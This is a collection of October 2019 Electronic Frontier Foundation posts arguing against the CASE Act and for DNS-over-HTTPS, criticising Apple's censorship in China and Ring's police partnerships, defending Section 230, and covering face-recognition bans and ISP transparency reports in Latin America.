Electronic Freedom Foundation

The House Votes in Favor of Disastrous Copyright Bill

EFF - Tue, 10/22/2019 - 7:07pm
It’s Not Too Late: The Senate Can Still Stop the CASE Act

The House of Representatives has just voted in favor of the Copyright Alternative in Small-Claims Enforcement Act (CASE Act) by 410-6 (with 16 members not voting), moving forward a bill that Congress has had no hearings and no debates on so far this session. That means that there has been no public consideration of the serious harm the bill could do to regular Internet users and their expression online.

The CASE Act creates a new body in the Copyright Office which will receive copyright complaints, notify the person being sued, and then decide if money is owed and how much. This new Copyright Claims Board will be able to fine people up to $30,000 per proceeding. Worse, if you get one of these notices (maybe an email, maybe a letter—the law actually does not specify) and accidentally ignore it, you’re on the hook for the money with a very limited ability to appeal. $30,000 could bankrupt or otherwise ruin the lives of many Americans.

The CASE Act also has bad changes to copyright rules, would let sophisticated bad actors get away with trolling and infringement, and might even be unconstitutional. It fails to help the artists it’s supposed to serve and will put a lot of people at risk.

Even though the House has passed the CASE Act, we can still stop it in the Senate. Tell your Senators to vote “no” on the CASE Act.

Take Action

Tell the Senate not bankrupt regular Internet users

EFF and Partners Urge U.S. Lawmakers to Support New DoH Protocol for a More Secure Internet

EFF - Tue, 10/22/2019 - 2:53pm
DoH Can Prevent Censorship and ISP Tracking by Encrypting Users’ Web Browsing

San Francisco—The Electronic Frontier Foundation (EFF) today called on Congress to support implementation of an Internet protocol that encrypts web traffic, a critical tool that will lead to dramatic improvements in user privacy and help impede the ability of governments to track and censor people.

EFF, joined by Consumer Reports and National Consumers League, said in a letter today to 12 members of Congress that the protocol, DNS-over-HTTPS (DoH), is a major step in enabling basic human rights—free speech and privacy—to become a natural and integral part of the Internet ecosystem.

“We see DoH as an important trend toward the use of encryption on the Internet—remedying a situation in which sensitive user data are exposed to an enormous range of eavesdroppers,” the letter says. It was sent to the chairs and ranking members of judiciary, homeland security, and science committees in the U.S. Senate and House of Representatives.

DoH is a next-generation privacy technology that enhances the security of the domain name system (DNS). When users type the name of a website in their browser, DNS looks up the numerical computer address of the site to facilitate the connection request. Without encryption, the content of the request, like your device’s IP address and the website you want to see, can be intercepted, read, or rerouted to fake sites.

DoH fixes those problems by encrypting DNS queries with TLS, a protocol used by the majority of the world’s top websites, that encrypts users’ requests so they can’t be read or modified. The encryption vastly increases security, preventing man-in-the-middle attacks, where a third party secretly intercepts web requests to alter them, steal log-in credentials, spy on the sender, or corrupt data.

“Countries like China and Turkey have used control over DNS to block their citizens’ access to websites and track the web activity of activists, a form of censorship that will eventually be much more difficult once there is widespread implementation of DoH,” said EFF Senior Legislative Counsel Ernesto Falcon.

Cable and telecom industry trade groups wrote to Congress last month voicing concerns that Google’s use of DoH raises data competition issues. Internet service providers are focused on protecting their ability to collect user data.  Congress should instead listen to consumer and privacy groups calling for strong privacy protections that give users more control over their data, allow them to sue companies like Google for privacy violations, and preserve states’ rights to pass their own privacy rules.

Lawmakers should not oppose a long-overdue Internet upgrade that addresses consumer demand for better privacy and will make the Internet safer and more open in many parts of the world in dire need of that.

“This is a game-changer for Internet users around the world, and is crucial for human rights workers, activists, journalists, and dissidents whose online activities are under surveillance,” said EFF Engineering Director Max Hunter. “We hope to see Congress step up and fully support systemic deployment of DoH.”

For more about DoH:

For more about EFF’s web encryption projects:

Contact:  ErnestoFalconSenior Legislative Counselernesto@eff.org

Apple’s Split Brain: Building Levers for Improved Security or Content Censorship?

EFF - Tue, 10/22/2019 - 1:29pm

For many years, Chinese users of Apple devices have had a very different experience from non-Chinese users. Chinese users can’t type or see the Taiwanese flag emoji (which has even caused severe bugs in the past); iCloud backups and encryption keys for Chinese users are stored locally within China; content services like iTunes Movies and iBooks are either not available or asked to step carefully around damaging China’s image; and the “curated” App Store’s selection criteria is markedly different, forbidding tools like VPNs which are prevalent in the rest of the world.

As the Chinese mainland government and Hong Kong population struggle over the extent to which their shared “one country, two systems” is applied, these differences have started to show in the special administrative region too. Last week, as part of an iOS update, Apple extended the Taiwanese flag emoji ban to Hong Kong and Macau. Under pressure from the authorities, it has censored applications there as well, despite worldwide criticism. Apple’s recent expansion of content restrictions into Hong Kong is extremely concerning, especially since Apple’s strictly walled gardens give it nearly unilateral control over this content.

Because so much of its supply chain—not to mention a valuable consumer market —is tied to China, Apple seems particularly vulnerable to Chinese state pressure. But Apple’s ability to enforce these experiences—and users’ inability to evade them—comes from the locked-down design of Apple products. Systems built and sold on the basis of increasing the privacy and security of their end-users risk being turned against them, as the motives and interests of Apple the company shift away from that of Apple’s customers.

When Apple’s Crystal Prison is Filled By The Chinese State

Unlike on Android, iOS users can’t side-load applications without first jailbreaking their phone entirely. Apple’s closed application ecosystems enables Apple to enforce rules about application content and take them down at any time.

This gives China a powerful hammer in the Apple ecosystem. In the second half of 2018 alone, Apple removed five hundred applications in mainland China to comply with local regulations. Greatfire’s AppleCensorship project detected over two thousand applications currently available in the U.S. that are not available in mainland China. Unavailable apps include censorship circumvention software like Tor and VPN apps, foreign software services like Google Earth, and news outlets like the New York Times. One of the most recent additions to this list is Quartz, which was removed following its reporting of the demonstrations in Hong Kong.

Apple’s policies for Hong Kong’s app store stood outside the heavy-handed rules of mainland censorship until recently, when Apple capitulated to state pressure to remove HKmap.live, a crowdsourced map application being used by protestors to track protest hotspots as well as events to avoid, like tear gas deployments and large gatherings of police. Because Apple’s App Store is the only app store for Apple devices, China can make this software effectively non-existent for Chinese, and now Hong Kongese, Apple users.

When “Safe Browsing” Can Feel Decidedly Unsafe

Researchers recently noticed a new clause in Safari’s Privacy & Security policies about sending some amount of browsing data to Chinese tech company Tencent to check whether a website is “fraudulent.” Apple has since confirmed that this works the same way as Google’s safe-browsing endpoint, and that Tencent is only consulted for devices with their region code set to mainland China.

Though only hash prefixes are sent, Tencent is still responsible for curating the blocklist, and has a history of conflating security-preserving measures with content censorship. Their QQ Browser, among other fundamental security and privacy flaws, uses a similar “security mechanism” to block website access on the client. On QQ Browser and many other Chinese browsing clients, the Github repository for a tech worker labor movement was blocked via the same mechanisms that are usually used to identify and block phishing sites. Thanks to widespread web encryption, and the fact that Github is too economically useful to China for the government to block entirely at the network level, browsers needed to resort to this workaround for client-side censorship of specific pages.

Apple Controls Its Ecosystem: But Who Controls Apple?

There’s some solace here that in Safari at least, we still have the option to turn this filtering off. But inserting content censorship or broader “public safety” interests into a narrow security mechanism is a dangerous road. As Apple commentator John Gruber points out, the very least that Apple owes its customers is proactive clarity and transparency when it farms out its huge responsibility to protect its users (and capabilities to control their experience) to third parties like Tencent.

Apple’s arguments for their strictly locked-down, DRM-laden garden include the stronger security and privacy standards it sets for applications by reviewing them. But by centralizing and monopolizing that power, it creates yet another powerful lever through which governments or other actors that have power over Apple can impose their control over these most personal of personal devices.

EFF to Amazon and Shaq: Stop Pushing Police Partnerships with Doorbell Camera Company

EFF - Tue, 10/22/2019 - 9:42am
EFF Urges Cancellation of Police Conference Event with Ring Spokesperson Shaquille O’Neal

Chicago – The Electronic Frontier Foundation (EFF) is urging Amazon, along with basketball legend Shaquille O’Neal, to cancel an event promoting Ring home-surveillance cameras at a police chiefs’ conference in Chicago later this month. EFF and many other civil liberties and privacy organizations are growing increasingly concerned about privacy-invasive partnerships between Ring and law enforcement agencies across the country, which threaten the privacy of all of us as we walk and drive around our communities.

Ring, a subsidiary of Amazon, sells networked cameras—often bundled with doorbells or lighting—that record video when they register movement and then send notifications to users’ cell phones. While Ring pitches the technology as a way to make your home safer, more than 500 police departments across the country have partnered with Ring to create an omnipresent surveillance system gathering video of people going about their lives.

The exact contours of these partnerships are unclear, thanks to restrictive contracts from Ring. However, in-depth reporting from various news outlets have shown a number of worrisome arrangements. For example, police that partner with Ring reportedly have access to Ring’s “Law Enforcement Neighborhood Portal,” which allows police to request footage from specific users. And once Ring footage ends up with police, it's considered evidence and out of Ring’s control—the video could be shared beyond your local law enforcement and you would likely never know. Amazon also encourages police to recommend that residents install the Ring app and purchase cameras for their homes.

“These partnerships expand the web of government surveillance of public places,” said EFF Policy Analyst Matthew Guariglia. “While crime is down in most parts of the country, Ring breeds paranoia, creating a feeling of crime everywhere. There’s too little consideration for the safety and privacy of those on the other end of the camera—unsuspecting dog-walkers, delivery people, and others. You should think twice about any technology that facilitates the proliferation of police surveillance on the streets where we protest, canvas for political candidates, and move freely every day.”

O’Neal has been a spokesperson and co-owner of Ring since 2016. At last year’s conference for the International Association of Chiefs of Police (IACP), Ring and O’Neal gave out tens of thousands of dollars in free Ring hardware to attendees, turning law enforcement officers into unofficial promoters for the technology. On October 27, O’Neal will host this year’s party at the IACP. Today, EFF has released a video imploring Ring and O’Neal to cancel the event and learn about the dangers of unaccountable surveillance.

“Ring’s law enforcement partnerships are endangering communities, encouraging an atmosphere of mistrust, and facilitating near-constant surveillance by local police,” said EFF Digital Strategist Jason Kelley. “We invite Shaq to talk to our experts instead of attending this ill-advised party.”

For more on Ring, Shaq, and surveillance:

Contact:  MatthewGuariglia Policy Analystmatthew@eff.org JasonKelleyDigital Strategistjason@eff.org

EFF Challenges Ring Spokesperson Shaq Over Privacy Concerns

EFF - Tue, 10/22/2019 - 1:32am

EFF is asking Ring spokesman Shaquille O’Neal to cancel his appearance at a party hosted by the company at the upcoming International Association of Chiefs of Police conference on October 27. Instead, we’re challenging Shaq to a one-on-one: not on the basketball court, but across the table, so we can discuss with him how the ubiquitous surveillance facilitated by Ring and its privacy-invasive partnerships with police can harm communities. 

Take Action 

Tell Shaq to Go One-on-one with EFF

Amazon and Ring have either ignored or dismissed the growing concerns among privacy experts, activists, and communities about the rapidly expanding number of partnerships between Ring and law enforcement. Two months ago, there were under 300; currently, the number has grown to well over 500.

%3Ciframe%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fembed%2Fr5VJwIFIsM8%3Fautoplay%3D1%26mute%3D1%22%20allow%3D%22accelerometer%3B%20autoplay%3B%20encrypted-media%3B%20gyroscope%3B%20picture-in-picture%22%20allowfullscreen%3D%22%22%20width%3D%22500%22%20height%3D%22422%22%20frameborder%3D%220%22%3E%3C%2Fiframe%3E Privacy info. This embed will serve content from youtube.com

EFF has decided to reach out to Shaq, who has been a co-owner and spokesperson for Ring since 2016, because of his interest in protecting communities and making them safer. Rather than join these IACP conventions, where Shaq hands out tens of thousands of dollars of Ring hardware to police officers from around the country, we’d like to offer the basketball legend a chance to talk to privacy experts about the damage these partnerships can do. 

Thanks to the partnerships with Ring, police only need to click a button to request hours of footage from dozens of cameras at a time. And, if a user refuses to share their footage with police, officers can bring a warrant to Amazon to get that footage. And once Ring footage ends up with police, it's considered evidence and out of the company's control—the obtained footage could be shared beyond your local law enforcement and you would likely never know.

In addition, these cameras pose risks to non-Ring users: every day, thousands of unsuspecting dog-walkers, delivery people, pedestrians, drivers, and others are being surveilled by Ring cameras, and by extension, Amazon, and—thanks to these partnerships—police. While the goal of the company appears to be community safety, there’s little consideration to the safety and privacy for those on the other end of the camera, who automatically become suspect thanks to this omnipresent camera network. The ease with which police can request access to this vast network of cameras can chill free movement, association, speech, and political expression in a neighborhood. 

That’s why we’re turning to Shaq—and you. We’re asking for your help to tweet at Shaq and Ring and ask them to take these privacy concerns seriously. We’re hoping Shaq will sit down with us, one-on-one, and learn how these partnerships turn our neighborhoods into vast, unaccountable surveillance networks. These partnerships with Ring are #NothingButDragnet. 

Visit EFF.org/Ring to find out more, and to watch EFF’s on-court challenge to Shaq.

Ready to Pay $30,000 for Sharing a Photo Online? The House of Representatives Thinks You Are

EFF - Mon, 10/21/2019 - 8:10am

Tomorrow the House of Representatives has scheduled to vote on what appears to be an unconstitutional copyright bill that carries with it life altering penalties. The bill would slap $30,000 fines on Internet users who share a copyrighted work they don’t own online.

Take Action

Now is the time to tell your Representative to vote NO

Supporters of the bill insist there’s no problem, because $30,000 isn’t that much money. They even laughed about it. We know the reality: when nearly half of this country would struggle to afford an emergency $400 expense, the penalties in this bill are deadly serious. What’s worse, they’ll be imposed not by an experienced judge, but instead by a committee of unaccountable bureaucrats.

What the CASE Act Does and Why it is a Disaster for Internet Users

The CASE Act creates a new tribunal separate from the federal judiciary (this is part of the constitutional problem) and places it within the Copyright Office. This agency has a sad history of industry capture, and often takes its cues from major content companies as opposed to average Americans. The new tribunals will receive complaints from rightsholders (anyone that has taken a photo, video, or written something) and will issue a “notice” to the party being sued.

We don’t actually know what this notice will look like. It could be an email, a text message, a phone call with voice mail, or a letter in the mail. Once the notice goes out, the targeted user has to respond within a tight deadline. Fail to respond in time means you’ll automatically lose, and are on the hook for $30,000. That’s why EFF is concerned that this law will easily be abused by copyright trolls. The trolls will cast a wide net, in hopes of catching Internet users unaware. Corporations with lawyers will be able to avoid all this, because they’ll have paid employees in charge of opting out of the CASE Act. But regular Americans with kids, jobs, and other real-life obligations could easily miss those notices, and lose out.

The CASE Act Radically Changes Copyright Law

One of the most disastrous changes to copyright law the bill creates is granting huge statutory damages to copyright owners who haven’t even registered their works. Under current law, if you copy a work that isn’t registered—meaning, the vast majority of things that are shared by users every single day—you’re only on the hook for the copyright owner’s actual economic loss. This is called “actual damages,” and very often, it’s $0. Under CASE, however, every copyrighted work will automatically eligible for $30,000 in damages—whether or not the owner has bothered to register it.

Under current law, when I take a photo of my kids and someone shares it without my permission, the most I can sue them for is nearly always $0. The CASE Act is a radical departure from this sensible rule. If it passes, sharing most of what you see online—photos, videos, writings, and other works—means risking crippling liability.

If this is upsets you and you want Congress to leave Internet users alone, then you have to contact your Representative and two Senators today, and tell them to vote NO on the CASE Act.

Take Action

Now is the time to tell your Representative to vote NO

Massachusetts: Tell Your Lawmakers to Press Pause on Government Face Surveillance

EFF - Thu, 10/17/2019 - 2:13pm

Face surveillance by government poses a threat to our privacy, chills protest in public places, and amplifies historical biases in our criminal justice system. Massachusetts has the opportunity to become the first state to stop government use of this troubling technology, from Provincetown to Pittsfield.

Massachusetts residents: tell your legislature to press pause on government use of face surveillance throughout the Commonwealth. Massachusetts bills S.1385 and H.1538 would place a moratorium on government use of the technology, and your lawmakers need to hear from you ahead of an Oct. 22 hearing on these bills.


Pause Government Face Surveillance in Massachusetts

Concern over government face surveillance in our communities is widespread. Polling from the ACLU of Massachusetts has found that more than three-quarters, 79 percent, support a statewide moratorium.

The city council of Somerville, Massachusetts voted unanimously in July to ban government face surveillance altogether, becoming the first community on the East coast to do so. The town of Brookline, Massachusetts is currently considering a ban of its own. In California, the cities of San Francisco, Oakland—and just this week—Berkeley have passed bans as well.

EFF has advocated for governments to stop use of face surveillance in our communities immediately, particularly in light of what researchers at MIT’s Media Lab and others have found about its high error rates—particularly for women and people of color.

Even if it were possible to lessen these misidentification risks, however, government use of face recognition technology still poses grave threats to safety and privacy. Regardless of our race or gender, law enforcement use of face recognition technology poses a profound threat to personal privacy, political and religious expression, and the fundamental freedom to go about our lives without having our movements and associations covertly documented and analyzed.

Tell your lawmakers to support this bill and make sure that the people of Massachusetts have the opportunity to evaluate the consequences of using this technology before this type of mass surveillance becomes the norm in your communities.

Why Fiber is Vastly Superior to Cable and 5G

EFF - Wed, 10/16/2019 - 6:20pm

The United States, its states, and its local governments are in dire need of universal fiber plans. Major telecom carriers such as AT&T and Verizon have discontinued their fiber-to-the-home efforts, leaving most people facing expensive cable monopolies for the future. While much of the Internet infrastructure has already transitioned to fiber, a supermajority of households and businesses across the country still have slow and outdated connections. Transitioning the “last mile” into fiber will require a massive effort from industry and government—an effort the rest of the world has already started.

Unfortunately, arguments by the U.S. telecommunications industry that 5G or currently existing DOCSIS cable infrastructure are more than up to the task of substituting for fiber have confused lawmakers, reporters, and regulators into believing we do not have a problem. In response, EFF has recently completed extensive research into the currently existing options for last mile broadband and lays out what the objective technical facts demonstrate. By every measurement, fiber connections to homes and businesses are, by far, the superior choice for the 21st century. It is not even close.

The Speed Chasm Between Fiber and Other Options

As a baseline, there is a divide between “wireline” internet (like cable and fiber) and “wireless” internet (like 5G). Cable systems can already deliver better service to most homes and businesses than 5G wireless deployments because the wireline service can carry signals farther with less interference than radio waves in the air.  We’ve written about the difference between wireless and wireline internet technologies in the past. While 5G is a major improvement over previous generations of wireless broadband, cable internet will remain the better option for the vast majority of households in terms of both reliability and raw speed.

Gigabit and faster wireless networks have to rely on high frequency spectrum in order to have sufficient bandwidth to deliver those speeds. But the faster the speed, and the higher the frequency,the more environmental factors such as the weather or physical obstructions interfere with the transmission. Gigabit 5G uses “millimeter wave” frequencies, which can’t travel through doors or walls. In essence, the real world environment adds so much friction to wireless transmissions at high-speeds that any contention that it can replace wireline internet fiber or cable—which contend with few of those barriers due to insulated wires— is suspect.

Meanwhile, fiber systems have at least a 10,000 (yes ten...thousand) fold advantage over cable systems in terms of raw bandwidth. This translates into a massive advantage for data capacity, and it’s why scientists have been able to squeeze more than 100 terabits per second (100,000 Gb/s) down a single fiber. The most advanced cable technology has achieved max speeds of around 10 Gb/s in a lab. Cable has not, and will not, come close to fiber. As we explain in our whitepaper, fiber also has significantly less latency, fewer problems with dropped packets, and will be easier to upgrade in the future.

Incumbents Favor the Status Quo Because its Expensive for You and Profitable for Them

The American story of broadband deployment is a tragic one where your income level determines  whether you have competition and affordable access. In the absence of national coverage policies, low-income Americans and rural Americans have been left behind. This stands to get worse absent a fundamental commitment to fiber for everyone. Our current situation and outlook for the future like did not happen in a vacuum—policy decisions made more than a decade ago, at the advent of fiber deployment in the United States, have proven to be complete failures when it comes to universal access. EFF’s review of the history of those decisions in the early 2000s has shown that none of the rationales have been justified by what followed.

But it doesn’t have to be like this. There is absolutely no good reason we have to accept the current situation as the future. A fundamental refocus on competition, universality, and affordability by local, state, and the federal government is essential to get our house back in order. Policymakers doing anything short of that are effectively concluding that having slower, more expensive cable as your only choice for the gigabit future is an acceptable outcome. 

EFF Urges Congress Not to Dismantle Section 230

EFF - Wed, 10/16/2019 - 5:36pm
The Keys to a Healthy Internet Are User Empowerment and Competition, Not Censorship

The House Energy and Commerce Committee held a legislative hearing today over what to do with one of the most important Internet laws, Section 230. Members of Congress and the testifying panelists discussed many of the critical issues facing online activity like how Internet companies moderate their users’ speech, how Internet companies and law enforcement agencies are addressing online criminal activity, and how the law impacts competition. 

EFF Legal Director Corynne McSherry testified at the hearing, offering a strong defense of the law that’s helped create the Internet we all rely on today. In her opening statement, McSherry urged Congress not to take Section 230’s role in building the modern Internet lightly:

We all want an Internet where we are free to meet, create, organize, share, debate, and learn. We want to have control over our online experience and to feel empowered by the tools we use. We want our elections free from manipulation and for women and marginalized communities to be able to speak openly about their experiences.

Chipping away at the legal foundations of the Internet in order to pressure platforms to play the role of Internet police is not the way to accomplish those goals. 

%3Ciframe%20src%3D%22https%3A%2F%2Fwww.c-span.org%2Fvideo%2Fstandalone%2F%3Fc4822786%2Fcorynne-mcsherry-section-230%22%20allowfullscreen%3D%22allowfullscreen%22%20width%3D%22512%22%20height%3D%22330%22%20frameborder%3D%220%22%3E%3C%2Fiframe%3E Privacy info. This embed will serve content from c-span.org

Recognizing the gravity of the challenges presented, Ranking Member Cathy McMorris Rodgers (R-WA) aptly stated: “I want to be very clear: I’m not for gutting Section 230. It’s essential for consumers and entities in the Internet ecosystem. Misguided and hasty attempts to amend or even repeal Section 230 for bias or other reasons could have unintended consequences for free speech and the ability for small businesses to provide new and innovative services.” 

We agree. Any change to Section 230 risks upsetting the balance Congress struck decades ago that created the Internet as it exists today. It protects users and Internet companies big and small, and leaves open the door to future innovation. As Congress continues to debate Section 230, here are some suggestions and concerns we have for lawmakers willing to grapple with the complexities and get this right.

Facing Illegal Activity Online: Focus on the Perpetrators

Much of the hearing focused on illegal speech and activity online. Representatives and panelists mentioned examples like illegal drug sales, wildlife sales, and fraud. But there’s an important distinction to make between holding Internet intermediaries, such as social media companies and classified ads sites, liable for what their users say or do online, and holding users themselves accountable for their behavior.

Section 230 has always had a federal criminal law carve out. This means that truly culpable online platforms can already be prosecuted in federal court, alongside their users, for illegal speech and activity. For example, a federal judge in the Silk Road case correctly ruled that Section 230 did not provide immunity against federal prosecution to the operator of a website that hosted other people’s ads for illegal drugs.

But EFF does not believe prosecuting Internet intermediaries is the best answer to the problems we find online. Rather, both federal and state government entities should allocate sufficient resources to target the direct perpetrators of illegal online behavior; that is, the users themselves who take advantage of open platforms to violate the law. Section 230 does not provide an impediment to going after these bad actors. McSherry pointed this out in her written testimony: “In the infamous Grindr case... the abuser was arrested two years ago under criminal charges of stalking, criminal impersonation, making a false police report, and disobeying a court order.”

Weakening Section 230 protections in order to expand the liability of online platforms for what their users say or do would incentivize companies to over-censor user speech in an effort to limit the companies’ legal exposure. Not only would this be harmful for legitimate user speech, it would also detract from law enforcement efforts to target the direct perpetrators of illegal behavior. As McSherry noted regarding the Allow States and Victims to Fight Online Sex Trafficking Act (FOSTA):

At this committee’s hearing on November 30, 2017, Tennessee Bureau of Investigation special agent Russ Winkler explained that online platforms were the most important tool in his arsenal for catching sex traffickers. One year later, there is anecdotal evidence that FOSTA has made it harder for law enforcement to find traffickers. Indeed, several law enforcement agencies report that without these platforms, their work finding and arresting traffickers has hit a wall.

Speech Moderation: User Choice and Empowerment

In her testimony, McSherry stressed that the Internet is a better place for online community when numerous platforms are available with a multitude of moderation philosophies. Section 230 has contributed to this environment by giving platforms the freedom to moderate speech the way they see fit.

The  freedom  that Section 230 afforded to Internet startups to choose their own moderation strategies has led to a multiplicity of options  for users—some more restrictive and sanitized, some more laissez-faire.  That  mix of  moderation philosophies contributes to a healthy environment for free expression and association online.

Reddit’s Steve Huffman echoed McSherry’s defense of Section 230 (PDF), noting that its protections have enabled the company to improve on its moderation practices over the years. He explained that the company’s speech moderation philosophy is one that prioritizes users making decisions about how they’d like to govern themselves:

The way Reddit handles content moderation today is unique in the industry. We use a governance model akin to our own democracy—where everyone follows a set of rules, has the ability to vote and self-organize, and ultimately shares some responsibility for how the platform works.

In an environment where platforms have their own approaches to content moderation, users have the ultimate power to decide which ones to use. McSherry noted in her testimony that while Grindr was not held liable for the actions of one user, that doesn’t mean that Grindr didn’t suffer. Grindr lost users, as they moved to other dating platforms. One reason why it’s essential that Congress protect Section 230 is to preserve the multitude of platform options.

“As a litigator, [a reasonableness standard] is terrifying. That means a lot of litigation risk, as courts try to figure out what counts as reasonable.”

Later in the hearing, Rep. Darren Soto (D-FL) asked each of the panelists who should be “the cop on the beat” in patrolling online speech. McSherry reiterated that users themselves should be empowered to decide what material they see online: “A cardinal principle for us at EFF is that at the end of the day, users should be able to control their Internet experience, and we need to have many more tools to make that possible.”

If some critics of Section 230 get their way, users won’t have that power. Prof. Danielle Citron offered a proposal (PDF) that Congress implement a “duty of care” regimen, where platforms would be required to show that they’re meeting a legal “reasonableness” standard in their moderation practices in order to keep their Section 230 protection. She proposes that courts look at what platforms are doing generally to moderate content and whether their policies are reasonable, rather than what a company did with respect to a particular piece of user content.

But inviting courts to determine what moderation practices are best would effectively do away with Section 230’s protections, disempowering users in the process. In McSherry’s words, “As a litigator, [a reasonableness standard] is terrifying. That means a lot of litigation risk, as courts try to figure out what counts as reasonable.”

Robots Won’t Fix It

There was plenty of agreement that current moderation was flawed, but much disagreement about why it was flawed. Subject-matter experts on the panel frequently described areas of moderation that were not in their purview as working perfectly fine, and questioning why those techniques could not be applied to other areas.

The deeper you look at current moderation—and listen carefully to those directly silenced by algorithmic solutions—the more you understand that robots won’t fix it.

In one disorienting moment, Gretchen Peters of the Alliance to Counter Crime Online asked the congressional committee when they’d last seen a “dick pic” on Facebook, and took their silence as an indication that Facebook had solved the dick pic problem. She then suggested Facebook could move on to scanning for other criminality. Professor Hany Farid, an expert in at-scale, resilient hashing of child exploitative imagery, wondered why the tech companies could not create digital fingerprinting solutions for opioid sales.

Many cited Big Tech’s work to automatically remove what they believe to be copyright-infringing material as a potential model for other areas—perhaps unaware that the continuing failure of copyright bots is one of the few areas where EFF and the entertainment industry agree (though we think they take down too much entirely lawful material, and Hollywood thinks they’re not draconian enough.)

The truth is that the deeper you look at current moderation—and listen carefully to those directly silenced by algorithmic solutions—the more you understand that robots won’t fix it. Robots are still terrible at understanding context, which has resulted in everything from Tumblr flagging pictures of bowls of fruit as “adult content” to YouTube removing possible evidence of war crimes because it categorized the videos as “terrorist content.” Representative Lisa Blunt Rochester (D-DE) pointed out the consequences of having algorithms police speech, “Groups already facing prejudice and discrimination will be further marginalized and censored.” A lot of the demand for Big Tech to do more moderation is predicated on the idea that they’re good at it, with their magical tech tools. As our own testimony and long experience points out—they’re really not, with bots or without.

Could they do better? Perhaps, but as Reddit’s Huffman noted, doing so means that the tech companies need to be able to innovate without having those attempts result in a hail of lawsuits. That is, he said, “exactly the sort of ability that 230 gives us.”

Reforming 230 with Big Tech as the Focus Would Harm Small Internet Companies

Critics of 230 often fail to acknowledge that many of the solutions they seek are not within reach of startups and smaller companies. Techniques like preemptive blocking of content, persistent policing of user posts, and mechanisms that analyze speech in real time to see what needs to be censored are extremely expensive.

That means that controlling what users do, at scale, will only be doable by Big Tech. It’s not only cost prohibitive, it will carry a high cost of liability if they get it wrong. For example, Google’s ContentID is often used in the copyright context is held up as one means of enforcement, but it required a $100 million investment by Google to develop and deploy—and it still does a bad job.

Google’s Katherine Oyama testified that Google already employs around 10,000 people that work on content moderation—a bar that no startup could meet—but even that appears insufficient to some critics. By comparison, a website like Wikipedia, which is the largest repository of information in human history, employs just about 350 staff for its entire operation, and is heavily reliant on volunteers.

A set of rules that would require a Google-sized company to expend even more resources means that only the most well-funded firms could maintain global platforms. A minimally-staffed nonprofit like Wikipedia could not continue to operate as it does today. The Internet would become more concentrated, and further removed from the promise of a network that empowers everyone.

As Congress continues to examine the problems facing the Internet today, we hope lawmakers remember the role that Section 230 plays in defending the Internet’s status as a place for free speech and community online. We fear that undermining Section 230 would harden today’s largest tech companies from future competition. Most importantly, we hope lawmakers listen to the voices of the people they risk pushing offline.

Read McSherry’s full written testimony.

Victory! Berkeley City Council Unanimously Votes to Ban Face Recognition

EFF - Wed, 10/16/2019 - 4:46pm

Berkeley has become the third city in California and the fourth city in the United States to ban the use of face recognition technology by the government. After an outpouring of support from the community, the Berkeley City Council voted unanimously to adopt the ordinance introduced by Councilmember Kate Harrison earlier this year.

Berkeley joins other Bay Area cities, including San Francisco and Oakland, which also banned government use of face recognition. In July 2019, Somerville, Massachusetts became the first city on the East Coast to ban the government’s use of face recognition.

The passage of the ordinance also follows the signing of A.B. 1215, a California state law that places a three-year moratorium on police use of face recognition on body-worn cameras, beginning on January 1, 2020. As EFF’s Associate Director of Community Organizing Nathan Sheard told the California Assembly, using face recognition technology “in connection with police body cameras would force Californians to decide between actively avoiding interaction and cooperation with law enforcement, or having their images collected, analyzed, and stored as perpetual candidates for suspicion.”

Over the last several years, EFF has continually voiced concerns over the First and Fourth Amendment implications of government use of face surveillance. These concerns are exacerbated by research conducted by MIT’s Media Lab regarding the technology’s high error rates for women and people of color. However, even if manufacturers are successful in addressing the technology’s substantially higher error rates for already marginalized communities, government use of face recognition technology will still threaten safety and privacy, chill free speech, and amplify historical and ongoing discrimination in our criminal justice system.

Berkeley’s ban on face recognition is an important step toward curtailing the government’s use of biometric surveillance. Congratulations to the community that stood up in opposition to this invasive and flawed technology and to the city council members who listened.

¿Quién Defiende Tus Datos?: Four Years Setting The Bar for Privacy Protections in Latin America and Spain

EFF - Wed, 10/16/2019 - 11:22am

Four years have passed since our partners first published Who Defends Your Data (¿Quién Defiende Tus Datos?), a report that holds ISPs accountable for their privacy policies and processes in eight Latin America countries and Spain. Since then, we’ve seen major technology companies providing more transparency about how and when they divulge their users’ data to the government. This shift has been fueled in large part by public attention in local media. The project started in 2015 in Colombia, Mexico, and Peru, joined by Brazil in 2016, Chile and Paraguay in 2017, Argentina and Spain in 2018, and Panama this year.

When we started in 2015, none of the ISPs in the three countries surveyed had published transparency reports or any aggregate data about the number of data requests they received from governments. By 2019, the larger global companies with a regional presence in the nine countries surveyed are now doing this. This is a big victory for transparency, accountability, and users’ rights.

Telefónica (Movistar/Vivo), a global company with a local presence in Spain and in 15 countries in Latin America, has been leading the way in the region, closely followed by Millicom (Tigo) with offices in seven countries in South and Central America. Far behind is Claro (America Movil) with offices in 16 countries in the region. Surprisingly, in one country, Chile, the small ISP WOM! has also stood out for its excellent transparency reporting.

Telefonica publishes transparency reports in each of the countries we surveyed, while Millicom (Tigo) publishes transparency reports with data aggregated per specific region. In South America, Millicom (Tigo) publishes aggregate data for Bolivia, Colombia, and Paraguay. In 2018, Millicom (Tigo) also published a comprehensive Transparency report for Colombia only. While Claro (America Movil) operates in 16 countries in the region, it has only published a transparency report in one of the countries we surveyed, Chile. Chilean ISPs such as WOM!, VTR, and Entel have all also published their own transparency reports. In Brazil, however, Telefónica (Vivo) is the only Brazilian company that has published a transparency report.

All of the reports still have plenty of room for improvement. The level of information disclosed varies significantly company-by-company, and even country-by-country. Telefónica usually discloses a separate aggregate number for different types of government requests—such as wiretapping, metadata, service suspension, content blocking and filtering—in their transparency report. But for Argentina, Telefónica only provides a single aggregate figure that covers every kind of request. And in Brazil, for example, Telefónica Brazil has not published the number of government requests it accepts or rejects,  although it has published that information in other countries.

Companies have also adopted other voluntary standards in the region, like publishing their law enforcement guidelines for government data demands. For example, Telefónica provides an overview of the company's global procedure when dealing with government data requests. But four other companies, who operate in Chile, publish more precise guidelines adapted only to that country's legal frameworks including the small ISP WOM! and Entel, the largest national telecom company.

A Breakdown by Country

Colombia and Paraguay 

In 2015, the ¿Quién Defiende Tus Datos? project showed that keeping the pressure on—and having an open dialogue with—companies pay off. In Colombia, Fundación Karisma's 2015 report investigated five local ISPs and found that none published transparency reports on government blocking requests or data demands. By 2018, five of seven companies had published annual transparency reports on data requests, with four providing information on government blocking requests.

